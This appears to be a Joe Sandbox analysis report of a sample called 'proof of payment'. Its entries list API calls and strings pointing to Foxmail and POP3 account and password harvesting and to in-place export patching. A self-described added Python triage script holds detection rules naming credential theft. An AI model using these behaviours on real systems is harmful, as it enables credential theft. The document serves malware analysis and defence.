6377 1000571e _free 20 API calls 6375->6377 6376->6373 6377->6376 6381 100056b9 RtlLeaveCriticalSection 6378->6381 6380 10005130 6380->6370 6381->6380 6382->6351 6384 1000604a 6383->6384 6388 10006040 6383->6388 6385 10005c45 _free 5 API calls 6384->6385 6385->6388 6386 10002ada _ValidateLocalCookies 5 API calls 6387 10004abe 6386->6387 6387->6355 6387->6356 6388->6386 7191 10001f3f 7192 10001f4b ___scrt_is_nonwritable_in_current_image 7191->7192 7209 1000247c 7192->7209 7194 10001f57 ___scrt_is_nonwritable_in_current_image 
7195 10001f52 7195->7194 7196 10002041 7195->7196 7197 10001f7c 7195->7197 7199 10002639 ___scrt_fastfail 4 API calls 7196->7199 7220 100023de 7197->7220 7200 10002048 7199->7200 7201 10001f8b __RTC_Initialize 7201->7194 7223 100022fc RtlInitializeSListHead 7201->7223 7203 10001f99 ___scrt_initialize_default_local_stdio_options 7224 100046c5 7203->7224 7207 10001fb8 7207->7194 7208 10004669 _abort 5 API calls 7207->7208 7208->7194 7210 10002485 7209->7210 7232 10002933 IsProcessorFeaturePresent 7210->7232 7214 10002496 7215 1000249a 7214->7215 7243 100053c8 7214->7243 7215->7195 7218 100024b1 7218->7195 7219 10003529 ___vcrt_uninitialize 8 API calls 7219->7215 7274 100024b5 7220->7274 7222 100023e5 7222->7201 7223->7203 7227 100046dc 7224->7227 7225 10002ada _ValidateLocalCookies 5 API calls 7226 10001fad 7225->7226 7226->7194 7228 100023b3 7226->7228 7227->7225 7229 100023b8 ___scrt_release_startup_lock 7228->7229 7230 10002933 ___isa_available_init IsProcessorFeaturePresent 7229->7230 7231 100023c1 7229->7231 7230->7231 7231->7207 7233 10002491 7232->7233 7234 100034ea 7233->7234 7235 100034ef ___vcrt_initialize_winapi_thunks 7234->7235 7246 10003936 7235->7246 7238 100034fd 7238->7214 7240 10003505 7241 10003510 7240->7241 7242 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7240->7242 7241->7214 7242->7238 7270 10007457 7243->7270 7248 1000393f 7246->7248 7249 10003968 7248->7249 7250 100034f9 7248->7250 7260 10003be0 7248->7260 7251 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7249->7251 7250->7238 7252 100038e8 7250->7252 7251->7250 7265 10003af1 7252->7265 7255 100038fd 7255->7240 7256 10003ba2 ___vcrt_FlsSetValue 6 API calls 7257 1000390b 7256->7257 7258 10003918 7257->7258 7259 1000391b ___vcrt_uninitialize_ptd 6 API calls 7257->7259 7258->7240 7259->7255 7261 10003a82 try_get_function 5 API calls 7260->7261 7262 10003bfa 7261->7262 7263 10003c18 InitializeCriticalSectionAndSpinCount 7262->7263 7264 10003c03 7262->7264 
7263->7264 7264->7248 7266 10003a82 try_get_function 5 API calls 7265->7266 7267 10003b0b 7266->7267 7268 10003b24 TlsAlloc 7267->7268 7269 100038f2 7267->7269 7269->7255 7269->7256 7273 10007470 7270->7273 7271 10002ada _ValidateLocalCookies 5 API calls 7272 100024a3 7271->7272 7272->7218 7272->7219 7273->7271 7275 100024c4 7274->7275 7276 100024c8 7274->7276 7275->7222 7277 10002639 ___scrt_fastfail 4 API calls 7276->7277 7279 100024d5 ___scrt_release_startup_lock 7276->7279 7278 10002559 7277->7278 7279->7222 7706 100067bf 7711 100067f4 7706->7711 7709 100067db 7710 1000571e _free 20 API calls 7710->7709 7712 10006806 7711->7712 7721 100067cd 7711->7721 7713 10006836 7712->7713 7714 1000680b 7712->7714 7713->7721 7722 100071d6 7713->7722 7715 1000637b _free 20 API calls 7714->7715 7716 10006814 7715->7716 7718 1000571e _free 20 API calls 7716->7718 7718->7721 7719 10006851 7720 1000571e _free 20 API calls 7719->7720 7720->7721 7721->7709 7721->7710 7723 100071e1 7722->7723 7724 10007209 7723->7724 7726 100071fa 7723->7726 7725 10007218 7724->7725 7731 10008a98 7724->7731 7738 10008acb 7725->7738 7728 10006368 _free 20 API calls 7726->7728 7730 100071ff ___scrt_fastfail 7728->7730 7730->7719 7732 10008aa3 7731->7732 7733 10008ab8 RtlSizeHeap 7731->7733 7734 10006368 _free 20 API calls 7732->7734 7733->7725 7735 10008aa8 7734->7735 7736 100062ac _abort 26 API calls 7735->7736 7737 10008ab3 7736->7737 7737->7725 7739 10008ae3 7738->7739 7740 10008ad8 7738->7740 7742 10008af4 _free 7739->7742 7743 10008aeb 7739->7743 7741 100056d0 21 API calls 7740->7741 7747 10008ae0 7741->7747 7745 10008af9 7742->7745 7746 10008b1e RtlReAllocateHeap 7742->7746 7749 1000474f _free 7 API calls 7742->7749 7744 1000571e _free 20 API calls 7743->7744 7744->7747 7748 10006368 _free 20 API calls 7745->7748 7746->7742 7746->7747 7747->7730 7748->7747 7749->7742 7886 10005bff 7894 10005d5c 7886->7894 7889 10005b7a _free 20 API calls 7890 10005c1b 7889->7890 7891 10005c28 7890->7891 7892 
10005c2b 11 API calls 7890->7892 7893 10005c13 7892->7893 7895 10005c45 _free 5 API calls 7894->7895 7896 10005d83 7895->7896 7897 10005d9b TlsAlloc 7896->7897 7898 10005d8c 7896->7898 7897->7898 7899 10002ada _ValidateLocalCookies 5 API calls 7898->7899 7900 10005c09 7899->7900 7900->7889 7900->7893

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                      • lstrcatW.KERNEL32(?,?), ref: 10001151
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                      • FindClose.KERNEL32(00000000), ref: 100011DB
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                      • String ID:
                                      • API String ID: 1083526818-0
                                      • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                      • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                      • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                      • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                        • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                        • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                        • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                      • lstrlenW.KERNEL32(?), ref: 100014C5
                                      • lstrlenW.KERNEL32(?), ref: 100014E0
                                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                      • String ID: )$Foxmail$ProgramFiles
                                      • API String ID: 672098462-2938083778
                                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                        • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (rendered graph omitted): basic blocks 1000c7a7-1000c872, calling 1000c7e6 and 1000c877; API calls GetModuleHandleA, GetProcAddress, VirtualProtect
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                        • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-0
                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (rendered graph omitted): basic blocks 1000c803-1000c872, calling 1000c877; API calls GetProcAddress, VirtualProtect (twice), GetModuleHandleA, GetProcAddress
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProcProtectVirtual$HandleModule
                                      • String ID:
                                      • API String ID: 2152742572-0
                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                      • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                      • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                      • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                      • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                      • ExitProcess.KERNEL32 ref: 10004AEE
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                      • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                      • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                      • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                      • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                      • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                      • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                      • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                      • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                      • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (rendered graph omitted): basic blocks 1000173a-100019b1, calling 1000c030, 10002c40, 10001cca, 10001ede, 10001ee7, 100044b0, 10001db7, 100016aa and 100015da
                                      APIs
                                        • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                        • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                        • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                      • _strlen.LIBCMT ref: 10001855
                                      • _strlen.LIBCMT ref: 10001869
                                      • _strlen.LIBCMT ref: 1000188B
                                      • _strlen.LIBCMT ref: 100018AE
                                      • _strlen.LIBCMT ref: 100018C8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _strlen$File$CopyCreateDelete
                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                      • API String ID: 3296212668-3023110444
                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                      • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                      Uniqueness

                                      Uniqueness Score: -1.00%
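Worked example (added here; not part of the Joe Sandbox report or its IDA plugin): a small Python triage script that parses "APIs" and "String ID" lines in the format used in the entries above and tags each function entry with the capability its API set and strings suggest. Three patterns from this section drive the rules: GetProcAddress followed by VirtualProtect with PAGE_READWRITE (00000004) or PAGE_EXECUTE_READWRITE (00000040) over a small range, as at 1000C803 (0x78 bytes), which is consistent with patching a resolved export in place; GetEnvironmentVariableW(ProgramFiles) plus FindFirstFileW together with the string "Foxmail", as at 10001434, which is mail-client path discovery; and the fragments Acco/un/t, Pass/word and POP3 at 1000173a, handled with _strlen and CopyFileW/CreateFileW/DeleteFileW, which are consistent with credential-file harvesting. The sample text embedded in the script is constructed from a handful of lines copied from those entries plus the CRT exit stub at 10004AD5 as a negative case; the tag names, the keyword list and the mail-client list are the example's own assumptions, not something the report states.

```python
import re

# Constructed sample: a few "APIs" / "String ID" lines copied in the report's own
# format from the entries above (Foxmail path builder, 1000C803 export patching,
# POP3/Account/Password fragment handler, and a CRT exit stub that should get no
# tag). Not a complete report dump.
SAMPLE_REPORT = """\
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
• lstrcatW.KERNEL32(00000000), ref: 10001521
• String ID: )$Foxmail$ProgramFiles
Uniqueness Score: -1.00%
• GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Uniqueness Score: -1.00%
  • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
  • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
• _strlen.LIBCMT ref: 10001855
• String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
Uniqueness Score: -1.00%
• GetCurrentProcess.KERNEL32(?,?,10004A8A), ref: 10004AD5
• TerminateProcess.KERNEL32(00000000,?,10004A8A), ref: 10004ADC
• ExitProcess.KERNEL32 ref: 10004AEE
Uniqueness Score: -1.00%
"""

# One "APIs" bullet: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: ADDR". "_strlen.LIBCMT ref: ..." has no args.
BULLET_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
STRING_RE = re.compile(r"•\s*String ID:\s*(?P<ids>.*)")
ENTRY_END = "Uniqueness Score"                       # last line of each entry
PAGE_RW = {"00000004", "00000040"}                   # PAGE_READWRITE, PAGE_EXECUTE_READWRITE
CREDENTIAL_WORDS = ("Account", "Password", "POP3")   # assumed keyword list
MAIL_CLIENTS = {"Foxmail"}                           # assumed client list


def parse_entries(report_text):
    """Split report text into entries: [{'calls': [(api, args, ref)], 'strings': [...]}]."""
    entries, cur = [], {"calls": [], "strings": []}
    for line in report_text.splitlines():
        if ENTRY_END in line:
            if cur["calls"] or cur["strings"]:
                entries.append(cur)
            cur = {"calls": [], "strings": []}
            continue
        m = STRING_RE.search(line)
        if m:
            cur["strings"].extend(s for s in m.group("ids").split("$") if s)
            continue
        m = BULLET_RE.search(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur["calls"].append((m.group("api"), args, m.group("ref")))
    if cur["calls"] or cur["strings"]:
        entries.append(cur)
    return entries


def can_tile(word, fragments):
    """True if `word` can be spelled by concatenating fragments (reuse allowed)."""
    if word == "":
        return True
    return any(can_tile(word[len(f):], fragments)
               for f in set(fragments) if f and word.startswith(f))


def classify(entry):
    """Return (capability tags, credential keywords assembled from string fragments)."""
    apis = {api for api, _, _ in entry["calls"]}
    tags = set()
    # Resolve an export, then make a small range writable: in-place patching.
    if {"GetProcAddress", "VirtualProtect"} <= apis and any(
            api == "VirtualProtect" and len(args) > 2 and args[2] in PAGE_RW
            for api, args, _ in entry["calls"]):
        tags.add("export-patching")
    # Directory enumeration keyed on a mail-client name.
    if "FindFirstFileW" in apis and MAIL_CLIENTS & set(entry["strings"]):
        tags.add("mail-client-discovery")
    # Keywords split into fragments plus file copy/delete: credential-file harvest.
    assembled = [w for w in CREDENTIAL_WORDS if can_tile(w, entry["strings"])]
    if assembled and {"CopyFileW", "DeleteFileW"} & apis:
        tags.add("credential-file-harvest")
    return tags, assembled


def triage(report_text):
    """[(first ref of entry, sorted tags, assembled keywords)] per function entry."""
    out = []
    for entry in parse_entries(report_text):
        tags, assembled = classify(entry)
        first_ref = entry["calls"][0][2] if entry["calls"] else "?"
        out.append((first_ref, sorted(tags), assembled))
    return out


if __name__ == "__main__":
    for ref, tags, words in triage(SAMPLE_REPORT):
        print(ref, tags or "-", words or "")
```

Run against a full report export, the script keys each finding on the first ref in the entry, so the subcall address (10001D1B) rather than the function start (1000173a) identifies the POP3 entry; the fragment tiling is what lets the split "Acco"/"un"/"t" strings count as "Account" without a hard-coded join order.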

                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: %m$~$Gon~$~F@7$~dra
                                      • API String ID: 4218353326-230879103
                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                      • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (rendered graph omitted): basic blocks 10007cc2-10007e0b, calling 10007e35, 1000571e (repeatedly), 100090ba and 100091b8
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 10007D06
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
